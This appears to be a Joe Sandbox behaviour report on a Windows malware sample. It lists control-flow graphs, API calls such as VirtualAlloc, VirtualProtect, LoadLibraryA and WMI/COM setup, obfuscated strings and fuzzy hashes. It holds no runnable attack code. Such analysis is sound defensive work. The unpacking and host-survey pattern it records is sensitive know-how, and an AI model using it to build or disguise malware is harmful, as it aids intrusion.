                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                        • Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 0 24b003c-24b0047 1 24b0049 0->1 2 24b004c-24b0263 call 24b0a3f call 24b0e0f call 24b0d90 VirtualAlloc 0->2 1->2 17 24b028b-24b0292 2->17 18 24b0265-24b0289 call 24b0a69 2->18 20 24b02a1-24b02b0 17->20 22 24b02ce-24b03c2 VirtualProtect call 24b0cce call 24b0ce7 18->22 20->22 23 24b02b2-24b02cc 20->23 29 24b03d1-24b03e0 22->29 23->20 30 24b0439-24b04b8 VirtualFree 29->30 31 24b03e2-24b0437 call 24b0ce7 29->31 33 24b04be-24b04cd 30->33 34 24b05f4-24b05fe 30->34 31->29 36 24b04d3-24b04dd 33->36 37 24b077f-24b0789 34->37 38 24b0604-24b060d 34->38 36->34 42 24b04e3-24b0505 LoadLibraryA 36->42 40 24b078b-24b07a3 37->40 41 24b07a6-24b07b0 37->41 38->37 43 24b0613-24b0637 38->43 40->41 44 24b086e-24b08be LoadLibraryA 41->44 45 24b07b6-24b07cb 41->45 46 24b0517-24b0520 42->46 47 24b0507-24b0515 42->47 48 24b063e-24b0648 43->48 52 24b08c7-24b08f9 44->52 49 24b07d2-24b07d5 45->49 50 24b0526-24b0547 46->50 47->50 48->37 51 24b064e-24b065a 48->51 53 24b07d7-24b07e0 49->53 54 24b0824-24b0833 49->54 55 24b054d-24b0550 50->55 51->37 56 24b0660-24b066a 51->56 57 24b08fb-24b0901 52->57 58 24b0902-24b091d 52->58 59 24b07e2 53->59 60 24b07e4-24b0822 53->60 64 24b0839-24b083c 54->64 61 24b05e0-24b05ef 55->61 62 24b0556-24b056b 55->62 63 24b067a-24b0689 56->63 57->58 59->54 60->49 61->36 68 24b056f-24b057a 62->68 69 24b056d 62->69 65 24b068f-24b06b2 63->65 66 24b0750-24b077a 63->66 64->44 67 24b083e-24b0847 64->67 72 24b06ef-24b06fc 65->72 73 24b06b4-24b06ed 65->73 66->48 74 24b084b-24b086c 67->74 75 24b0849 67->75 70 24b059b-24b05bb 68->70 71 24b057c-24b0599 68->71 69->61 83 24b05bd-24b05db 70->83 71->83 77 24b074b 72->77 78 24b06fe-24b0748 72->78 73->72 74->64 75->44 77->63 78->77 83->55
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 024B024D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                        • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                        • Instruction ID: ed7daa7ddff39a72fcb3f553f3f8b8c31c846d27a4821ffb9464b0ce1f7a7a5d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6526A74A01229DFDB65CF58C984BADBBB1BF09305F1480DAE54DAB351DB30AA85CF24

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 123 43ab0b-43ab1f 124 43ab20-43ab7b 123->124 124->124 125 43ab7d-43abce GetForegroundWindow call 43c7d0 124->125
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ForegroundWindow
                                                                                                                                                                                                                                        • String ID: ilmn
                                                                                                                                                                                                                                        • API String ID: 2020703349-1560153188
                                                                                                                                                                                                                                        • Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                        • Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 129 8d9296-8d92af 130 8d92b1-8d92b3 129->130 131 8d92ba-8d92c6 CreateToolhelp32Snapshot 130->131 132 8d92b5 130->132 133 8d92c8-8d92ce 131->133 134 8d92d6-8d92e3 Module32First 131->134 132->131 133->134 139 8d92d0-8d92d4 133->139 135 8d92ec-8d92f4 134->135 136 8d92e5-8d92e6 call 8d8f55 134->136 140 8d92eb 136->140 139->130 139->134 140->135
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008D92BE
                                                                                                                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 008D92DE
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550594932.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008D8000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_8d8000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                        • Instruction ID: 986f91ff287a342b0a13685f30c6fbd5ccbb12cd99a9e971059c43fcadc66acd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7F062351007147BD7203BF9988DA6F77ECFF49725F10062AE696D21C0DAB0EC454661

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 142 24b0e0f-24b0e24 SetErrorMode * 2 143 24b0e2b-24b0e2c 142->143 144 24b0e26 142->144 144->143
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,024B0223,?,?), ref: 024B0E19
                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,024B0223,?,?), ref: 024B0E1E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                        • Instruction ID: b25280a7d5a245074ce1b288960052ef9f67ce7971dda664f71e596d7bd501e9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84D0123514512877DB012A94DC09BCE7B1CDF05B67F008011FB0DD9180C770954046E5

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 440 43a950-43a961 441 43a976-43a988 call 43bf00 RtlReAllocateHeap 440->441 442 43a995-43a996 call 438e70 440->442 443 43a98a-43a993 call 438e30 440->443 444 43a968-43a96f 440->444 451 43a9a0-43a9a2 441->451 450 43a99b-43a99e 442->450 443->451 444->441 444->442 450->451
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B65C,00000000,?), ref: 0043A982
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                        • Instruction ID: 722538be6ec62bdfb2320af1aff19aeee9eb7e72755357ed04131fae2c05cc9a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99E0E576414611FBC6001B24BC06B1B3665AF8A721F02183AF440E6115DA38E811859F

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 452 43ab91-43aba8 GetForegroundWindow call 43c7d0 455 43abad-43abce 452->455
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ForegroundWindow
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2020703349-0
                                                                                                                                                                                                                                        • Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                        • Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                                                        • Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                        • Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                        • Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                        • Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008D8FA6
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550594932.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008D8000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_8d8000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                        • Instruction ID: 62849ee2102f47c93627703f6d8ba8ef74d46ee6d7ae21a465648cb904fe898e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6113C79A00208EFDB01DF98C985E99BBF5EF08351F158095F9489B362D771EA50DF80
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
                                                                                                                                                                                                                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(w!s#), ref: 004364FB
                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(A3q5), ref: 004365A1
                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00436613
                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00436775
                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 004367A0
                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 004367A6
                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 004367B3
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                        • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                                                                                                                                        • API String ID: 2485776651-4124187736
                                                                                                                                                                                                                                        • Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                        • Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                        • API String ID: 0-2246970021
                                                                                                                                                                                                                                        • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                        • Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                        • API String ID: 0-2246970021
                                                                                                                                                                                                                                        • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                        • Instruction ID: 673c083dda466ade3b22f4fa009005119c1ebb858f007a0b802bb4adba919c70
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E3242B0601B469FDB48CF2AD580389BBB1FF45304F548698C9695FB5ADB35A892CFC0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: *mB$67$@iB$V3R5
                                                                                                                                                                                                                                        • API String ID: 0-119712241
                                                                                                                                                                                                                                        • Opcode ID: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                        • Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &'$0c=e$2g1i$<k;m$B$wy
                                                                                                                                                                                                                                        • API String ID: 0-2430453506
                                                                                                                                                                                                                                        • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                        • Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                        • API String ID: 0-3264166258
                                                                                                                                                                                                                                        • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                        • Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                        • API String ID: 0-3264166258
